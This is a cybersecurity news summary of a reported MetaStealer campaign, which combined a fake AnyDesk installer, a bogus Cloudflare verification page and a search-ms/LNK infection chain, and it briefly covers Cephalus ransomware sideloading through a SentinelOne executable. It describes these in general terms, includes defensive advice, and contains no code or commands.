From ClickFix to MetaStealer: How Cyber Threats Are Evolving
▼ Summary
– Huntress analysts observed a malicious AnyDesk installer attack that used a fake Cloudflare verification page and deployed MetaStealer malware via a disguised MSI package.
– The attack chain involved a Windows File Explorer redirect and a search-ms URI protocol, differing from traditional ClickFix methods by not using the Run dialog box.
– MetaStealer, a known infostealer since 2022, harvests credentials and files, with the attack cleverly capturing the victim’s hostname as a subdomain.
– Threat actors are evolving their tradecraft by blending social engineering, like CAPTCHA lures, with advanced infection chains and evasive deployment strategies.
– Organizations should educate users on recognizing these lures and implement security measures beyond blocking the Run dialog box to counter evolving variants.
Cybersecurity professionals are witnessing a rapid evolution in attack methodologies, with threat actors increasingly blending social engineering with technically sophisticated infection chains. Recent observations reveal a shift from traditional ClickFix attacks to more nuanced strategies, including the deployment of MetaStealer malware through disguised installers and legitimate system tools.
Over the past several weeks, security analysts have documented a rise in incidents involving deceptive techniques. One campaign began with a fraudulent AnyDesk installer that imitated a typical ClickFix approach, using a counterfeit Cloudflare verification page. However, instead of following the expected path, the attack leveraged Windows File Explorer and a malicious MSI package disguised as a PDF to deliver MetaStealer.
In parallel, two separate cases involving the Cephalus ransomware variant were identified. This particular strain employs DLL sideloading via a legitimate SentinelOne executable to activate its payload. These developments underscore how attackers are refining their methods, combining familiar deception tactics with advanced evasion and deployment strategies.
ClickFix campaigns have grown steadily over the past year, capitalizing on users’ willingness to follow instructions involving CAPTCHA prompts. While many attacks adhere to the known pattern, some diverge significantly. In one recent example, a fake AnyDesk download led to a fabricated Cloudflare Turnstile page, a common lure in these schemes.
What set this incident apart was its subsequent behavior. Rather than directing the victim to the Windows Run dialog, the attack utilized the search-ms protocol handler to open Windows File Explorer. From there, users were guided to a remote SMB share where a malicious LNK file, masquerading as a PDF, awaited.
This LNK file executed a multi-stage process: it downloaded a legitimate AnyDesk installer to reduce suspicion while simultaneously retrieving a malicious MSI package from a controlled server. Notably, the fake PDF was designed to capture the victim’s hostname via an environment variable, providing attackers with valuable system information.
The MSI package contained several components, including a DLL and a CAB archive housing cleanup scripts and the MetaStealer payload. The final executable, protected with Private EXE Protector, exhibited behaviors consistent with known MetaStealer activity, such as credential harvesting and cryptocurrency wallet theft.
These attacks illustrate a concerning trend: the fusion of social engineering with seemingly routine system processes. By prompting users to interact with familiar interfaces like CAPTCHA verifications or file explorers, attackers increase their chances of bypassing security controls.
Traditional defensive measures, such as restricting access to the Windows Run dialog, may no longer suffice. Organizations must broaden their user education efforts, teaching staff to recognize suspicious verification prompts and unusual system behaviors. Continuous monitoring and updated threat intelligence are also critical for identifying and mitigating these evolving threats.
For those seeking deeper insights into current attack methodologies, technical breakdowns of recent incidents are available through dedicated cybersecurity briefings. These sessions provide detailed analyses of emerging malware, attacker tradecraft, and practical defense strategies, helping security teams stay ahead of adversarial innovations.
(Source: Bleeping Computer)
